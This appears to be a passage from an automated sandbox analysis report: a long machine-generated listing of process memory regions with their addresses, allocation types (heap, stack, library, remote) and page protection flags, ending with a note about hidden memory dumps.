trusted library allocation
page read and write
20AB6791000
trusted library allocation
page read and write
20AB2FD7000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
7FFAAC3E6000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
1F0B37E6000
heap
page read and write
1F0B3770000
trusted library allocation
page read and write
7FFAAC334000
trusted library allocation
page read and write
1F0B3780000
trusted library allocation
page read and write
CDA1FFF000
stack
page read and write
1AD03F41000
trusted library allocation
page read and write
1C4822E0000
heap
page read and write
20AB6755000
heap
page read and write
20AB6800000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1AD02B40000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
175C07A0000
heap
page read and write
1CC31910000
trusted library allocation
page read and write
20ACEFCA000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB3020000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0CC218000
heap
page read and write
1F0B37A0000
trusted library allocation
page read and write
1F0B3765000
trusted library allocation
page read and write
7217A39000
stack
page read and write
400000
unkown
page readonly
20ACEFFB000
heap
page read and write
14C000
stack
page read and write
20AB67C0000
trusted library allocation
page read and write
20ACF081000
heap
page read and write
1F0CC170000
trusted library allocation
page read and write
1AD03057000
trusted library allocation
page read and write
1AD01040000
heap
page read and write
A6108FC000
stack
page read and write
20ACEFD6000
heap
page read and write
1F0B37E9000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20ACEFC2000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
2350000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0B37B6000
heap
page read and write
1F0B37B9000
heap
page read and write
14C19000
trusted library allocation
page read and write
20ACEF81000
heap
page read and write
1AD02FB0000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB2F9F000
unkown
page read and write
403000
unkown
page readonly
20ACEF93000
heap
page read and write
1F0CC1B0000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
20ACF02A000
heap
page read and write
353ABFF000
stack
page read and write
1F0B37F0000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
1F0B3780000
trusted library allocation
page read and write
1F0B3780000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
205D4F50000
remote allocation
page read and write
20ACEF8B000
heap
page read and write
20ACEF88000
heap
page read and write
1AD00FE0000
heap
page read and write
1C4821F7000
heap
page read and write
1AD00FC0000
heap
page read and write
1AD03F49000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0CC190000
trusted library allocation
page read and write
21C4000
unkown
page readonly
20AB6790000
trusted library allocation
page read and write
721767E000
stack
page read and write
20AB6740000
trusted library allocation
page read and write
15619000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
721793F000
stack
page read and write
1F84000
stack
page read and write
1F0CC266000
heap
page read and write
1F0B37E5000
heap
page read and write
721898C000
stack
page read and write
20ACEFEC000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
20ACEFE7000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
7FFAAC4F0000
trusted library allocation
page read and write
1F0B3810000
heap
page read and write
20AB6838000
trusted library allocation
page read and write
20AB0FC0000
unkown
page execute and read and write
980000
heap
page read and write
1F0B37D6000
heap
page read and write
20ACEF87000
heap
page read and write
20ACEFDA000
heap
page read and write
20AB2D80000
unkown
page readonly
3AFF000
heap
page read and write
1F0B37A7000
heap
page read and write
1F0CC160000
trusted library allocation
page read and write
1AD03A22000
trusted library allocation
page read and write
7FFAAC345000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
21C4000
unkown
page readonly
20ACEFCC000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0CC184000
trusted library allocation
page read and write
190000
heap
page read and write
239F000
stack
page read and write
72172C3000
stack
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
AB45BFE000
stack
page read and write
20AB67A0000
trusted library allocation
page read and write
7217B3F000
stack
page read and write
23C0000
heap
page read and write
21C2000
unkown
page read and write
1F0B37A0000
trusted library allocation
page read and write
E03000
unkown
page readonly
20ACEF8C000
heap
page read and write
20AB67D0000
trusted library allocation
page read and write
2305000
heap
page read and write
1CC318F3000
trusted library allocation
page read and write
7FFAAC4D2000
trusted library allocation
page read and write
1F0C55FE000
trusted library allocation
page read and write
205D4863000
heap
page read and write
1F0B3851000
heap
page read and write
20ACEFBD000
heap
page read and write
25E0000
heap
page read and write
1F0B37ED000
heap
page read and write
20ACF28F000
heap
page read and write
404E000
stack
page read and write
1F0B37C1000
heap
page read and write
401000
unkown
page execute read
20ACEFD3000
heap
page read and write
20AB2F60000
unkown
page read and write
1F0B37D0000
trusted library allocation
page read and write
175C06A0000
heap
page read and write
1F0B3780000
trusted library allocation
page read and write
20AB67C0000
trusted library allocation
page read and write
20ACEFF1000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
20AB6840000
trusted library allocation
page read and write
2443000
heap
page read and write
1F0B3806000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
20ACEFC2000
heap
page read and write
1CC31900000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0B380F000
trusted library allocation
page read and write
1F0CC216000
heap
page read and write
400000
unkown
page readonly
1F0B3770000
trusted library allocation
page read and write
21C4000
unkown
page readonly
1F0CC150000
trusted library allocation
page read and write
26A5000
heap
page read and write
20AB65A0000
trusted library allocation
page read and write
23B1000
heap
page read and write
7FFAAC332000
trusted library allocation
page read and write
20ACEFC0000
heap
page read and write
1F0AFE58000
heap
page read and write
1F0CC170000
trusted library allocation
page read and write
1DCCE325000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1DCCE320000
heap
page read and write
20AB2FCA000
unkown
page read and write
1F0CC17B000
trusted library allocation
page read and write
403000
unkown
page readonly
1F0B3760000
trusted library allocation
page read and write
7217D3B000
stack
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0B37F5000
heap
page read and write
1CC2FF21000
heap
page read and write
40C000
unkown
page readonly
401000
unkown
page execute read
1F0CC150000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
205D484C000
heap
page read and write
1F0B37C9000
heap
page read and write
1F0B3761000
trusted library allocation
page read and write
1DCCE030000
heap
page read and write
20AB6795000
trusted library allocation
page read and write
20AB3030000
direct allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0B3800000
trusted library allocation
page read and write
20AC68CE000
trusted library allocation
page read and write
1F0B3710000
trusted library allocation
page read and write
20AB6750000
heap
page read and write
40A0000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
AB4547E000
unkown
page readonly
1F0B3810000
heap
page read and write
7FFAAC33D000
trusted library allocation
page execute and read and write
1F0CC150000
trusted library allocation
page read and write
14219000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB302D000
heap
page read and write
20AB2F30000
unkown
page read and write
1F0B37AC000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
7FFAAC4DD000
trusted library allocation
page execute and read and write
1F0B38A0000
trusted library allocation
page read and write
1AD010C6000
heap
page read and write
1F0B3780000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB3023000
heap
page read and write
16A19000
trusted library allocation
page read and write
20AB6600000
heap
page read and write
1F0CC216000
heap
page read and write
1F0B3770000
trusted library allocation
page read and write
20AB67B5000
trusted library allocation
page read and write
353A77C000
stack
page read and write
20ACEFE4000
heap
page read and write
7FFAAC4E4000
trusted library allocation
page execute and read and write
CDA1B7C000
stack
page read and write
20AD1750000
trusted library section
page read and write
1F0B37B1000
heap
page read and write
20ACF080000
heap
page read and write
20ACEFF4000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
1F0AFE5D000
heap
page read and write
1F0B3710000
trusted library allocation
page read and write
175C08F0000
heap
page read and write
1C482160000
heap
page read and write
AB455FE000
unkown
page read and write
1AD01089000
heap
page read and write
7FFAAC4E0000
trusted library allocation
page read and write
7DF4B36C0000
trusted library allocation
page execute and read and write
20AB19C0000
unkown
page execute and read and write
403000
unkown
page readonly
20ACEFDC000
heap
page read and write
1F0B3780000
trusted library allocation
page read and write
3A73000
heap
page read and write
1F0B37A0000
trusted library allocation
page read and write
239F000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20AC7311000
trusted library allocation
page read and write
1AD04393000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1AD011A0000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
400000
unkown
page readonly
7FFB1E866000
unkown
page readonly
AB4597E000
unkown
page readonly
1F0B3770000
trusted library allocation
page read and write
7217C3D000
stack
page read and write
AB458FE000
stack
page read and write
AB457FD000
stack
page read and write
20ACEF86000
heap
page read and write
2336000
heap
page read and write
256F000
stack
page read and write
1F0B37A8000
heap
page read and write
721777E000
stack
page read and write
20ACEFF1000
heap
page read and write
20AB6730000
trusted library allocation
page read and write
20AB6870000
trusted library allocation
page read and write
1F0B37C8000
heap
page read and write
400000
unkown
page readonly
20AB67C0000
trusted library allocation
page read and write
7217AB8000
stack
page read and write
1F0B3810000
trusted library allocation
page read and write
1DCCE130000
heap
page read and write
20AB6730000
trusted library allocation
page read and write
20AB6797000
trusted library allocation
page read and write
1AD01160000
trusted library allocation
page read and write
1F0B37E0000
trusted library allocation
page read and write
7FFB1E875000
unkown
page readonly
20AB6917000
trusted library allocation
page read and write
20AC68D0000
trusted library allocation
page read and write
20ACEFCF000
heap
page read and write
20AB67D0000
trusted library allocation
page read and write
23AF000
heap
page read and write
20AB68A6000
trusted library allocation
page read and write
1C482080000
heap
page read and write
1F0B385A000
heap
page read and write
20ACEFAC000
heap
page read and write
7FFAAC3F0000
trusted library allocation
page execute and read and write
7FFAAC416000
trusted library allocation
page execute and read and write
1F0B37D4000
heap
page read and write
1F0CC160000
trusted library allocation
page read and write
1F0CC190000
trusted library allocation
page read and write
1F0CC1A0000
trusted library allocation
page read and write
1CC2FF13000
heap
page read and write
1803000
unkown
page readonly
1AD031F8000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
20ACEF80000
heap
page read and write
1F0B0080000
trusted library allocation
page read and write
25BF000
stack
page read and write
20ACEFA1000
heap
page read and write
AB45B7E000
unkown
page readonly
1AD042D9000
trusted library allocation
page read and write
20AC68C9000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
175C06AA000
heap
page read and write
20AB302E000
heap
page read and write
1F0CC180000
trusted library allocation
page read and write
20ACEF89000
heap
page read and write
20AB683F000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0B37F5000
heap
page read and write
1DCCDE90000
heap
page read and write
10000
unkown
page readonly
20AC6911000
trusted library allocation
page read and write
20AB68C1000
trusted library allocation
page read and write
1DCCE056000
heap
page read and write
20AB2E90000
unkown
page read and write
7DF4B36B0000
trusted library allocation
page execute and read and write
2660000
heap
page read and write
A610AFF000
stack
page read and write
20ACEFAF000
heap
page read and write
26A0000
heap
page read and write
40A000
unkown
page read and write
1F0B3760000
trusted library allocation
page read and write
A12000
unkown
page readonly
1F0B3760000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1AD0349D000
trusted library allocation
page read and write
20AB301F000
heap
page read and write
252F000
stack
page read and write
20ACEFB9000
heap
page read and write
1F0CC180000
trusted library allocation
page read and write
1CC31900000
trusted library allocation
page read and write
72178F9000
stack
page read and write
20ACEFF1000
heap
page read and write
20AB6791000
trusted library allocation
page read and write
175C06D9000
heap
page read and write
72176F9000
stack
page read and write
17419000
trusted library allocation
page read and write
20ACEFAF000
heap
page read and write
20AC7D11000
trusted library allocation
page read and write
20ACEFDF000
heap
page read and write
1AD03F3C000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB67C0000
trusted library allocation
page read and write
1F0B3867000
heap
page read and write
7FFB1E850000
unkown
page readonly
20AB2F5E000
unkown
page read and write
20ACEFA9000
heap
page read and write
4DD000
heap
page read and write
1F0B37B0000
trusted library allocation
page read and write
1F0B3872000
heap
page read and write
12000
unkown
page readonly
1F0CC160000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
23E2000
heap
page read and write
1CC318F0000
trusted library allocation
page read and write
72173CE000
stack
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0CC180000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB2F00000
heap
page read and write
26FF000
heap
page read and write
7217CBF000
stack
page read and write
20AB6790000
trusted library allocation
page read and write
205D4F50000
remote allocation
page read and write
20AB68B0000
heap
page execute and read and write
20ACEF98000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB67C0000
trusted library allocation
page read and write
20ACEFE7000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
E03000
unkown
page readonly
1DCCE058000
heap
page read and write
1CC318F0000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1AD02FC0000
heap
page execute and read and write
20ACEF90000
trusted library allocation
page read and write
20AB2F73000
unkown
page read and write
1F0B3863000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
20AD2150000
trusted library section
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0B37E0000
heap
page read and write
1F0B3765000
trusted library allocation
page read and write
1F0B3880000
trusted library allocation
page read and write
1AD010CB000
heap
page read and write
1AD0408E000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
27AF000
stack
page read and write
403000
unkown
page readonly
20AB6790000
trusted library allocation
page read and write
20AB302A000
heap
page read and write
20AB6890000
trusted library allocation
page read and write
20ACEFD3000
heap
page read and write
1F0B3808000
trusted library allocation
page read and write
AB456FE000
stack
page read and write
20AB6790000
trusted library allocation
page read and write
4D0000
heap
page read and write
20ACEFFE000
heap
page read and write
1F0CC170000
trusted library allocation
page read and write
1F0B3780000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1AD0412D000
trusted library allocation
page read and write
1AD03F45000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20AB6830000
trusted library allocation
page read and write
20AC68C1000
trusted library allocation
page read and write
1AD02B45000
heap
page read and write
E03000
unkown
page readonly
1F0B3770000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20ACEF9B000
heap
page read and write
1DCCE05A000
heap
page read and write
20AB65B0000
heap
page readonly
1F0CC150000
trusted library allocation
page read and write
1AD042A6000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
20ACEFA9000
heap
page read and write
1F0B3879000
heap
page read and write
20ACF003000
heap
page read and write
20AB23C0000
unkown
page execute and read and write
1AD02FD1000
trusted library allocation
page read and write
1F0CC1A0000
trusted library allocation
page read and write
1F0CC170000
trusted library allocation
page read and write
20ACF0F9000
heap
page read and write
20AB6795000
trusted library allocation
page read and write
1FE0000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
353AAFF000
unkown
page read and write
AB451B6000
stack
page read and write
1AD011C5000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
401000
unkown
page execute read
1C482180000
heap
page read and write
20AB2F05000
heap
page read and write
2370000
heap
page read and write
1F0B3780000
trusted library allocation
page read and write
20ACF057000
heap
page read and write
20AB2F66000
unkown
page read and write
2330000
heap
page read and write
1F0CC1A0000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
1CC318F0000
trusted library allocation
page read and write
1A0000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0B3810000
heap
page read and write
1F0B3876000
heap
page read and write
10000
unkown
page readonly
20AB67A0000
trusted library allocation
page read and write
1F0AFE03000
heap
page read and write
23DB000
heap
page read and write
20ACEFBA000
heap
page read and write
1F0CC170000
trusted library allocation
page read and write
7FFAAC450000
trusted library allocation
page execute and read and write
175C08F5000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
20ACEFDF000
heap
page read and write
1803000
unkown
page readonly
1F0B3760000
trusted library allocation
page read and write
26EF000
stack
page read and write
20AB2FFE000
heap
page read and write
20ACEF9A000
heap
page read and write
1CC31920000
trusted library allocation
page read and write
1803000
unkown
page readonly
1412000
unkown
page readonly
1CC318F3000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20ACEFA9000
heap
page read and write
14213000
trusted library allocation
page read and write
1F0B37C0000
trusted library allocation
page read and write
1AD02E91000
heap
page read and write
1F0CC3ED000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
175C06C6000
heap
page read and write
1C482410000
heap
page read and write
7FFAAC588000
trusted library allocation
page read and write
14211000
trusted library allocation
page read and write
20AD0D50000
trusted library section
page read and write
72177FB000
stack
page read and write
20AB2F20000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
1CC318F3000
trusted library allocation
page read and write
233D000
heap
page read and write
20ACEFAF000
heap
page read and write
721734E000
stack
page read and write
175C0610000
heap
page read and write
20ACEFDF000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20AB2FE4000
heap
page read and write
CDA1EFF000
unkown
page read and write
20AB2E70000
unkown
page read and write
1F0B3840000
trusted library allocation
page read and write
401000
unkown
page execute read
266E000
stack
page read and write
400000
unkown
page readonly
20ACEFDF000
heap
page read and write
20ACEF9A000
heap
page read and write
1F0B3870000
heap
page read and write
AB45D7E000
unkown
page readonly
1F0B3760000
trusted library allocation
page read and write
1AD02A40000
heap
page execute and read and write
401000
unkown
page execute read
1F0B3760000
trusted library allocation
page read and write
1F0B3850000
trusted library allocation
page read and write
E03000
unkown
page readonly
1DCCDF90000
heap
page read and write
1AD02A47000
heap
page execute and read and write
20AB6790000
trusted library allocation
page read and write
1AD03F38000
trusted library allocation
page read and write
2300000
heap
page read and write
1F0B3876000
trusted library allocation
page read and write
1C3D7EE8000
heap
page read and write
1AD041A9000
trusted library allocation
page read and write
1F0B3761000
trusted library allocation
page read and write
1AD04275000
trusted library allocation
page read and write
AB454FE000
unkown
page read and write
AB4577E000
unkown
page readonly
20ACF028000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
21C4000
unkown
page readonly
721878E000
stack
page read and write
1F0B3760000
trusted library allocation
page read and write
20ACEFFD000
heap
page read and write
7FFAAC333000
trusted library allocation
page execute and read and write
1F0B37A0000
trusted library allocation
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0CC170000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
20ACEFFD000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B0080000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
There are 779 hidden memdumps, click here to show them.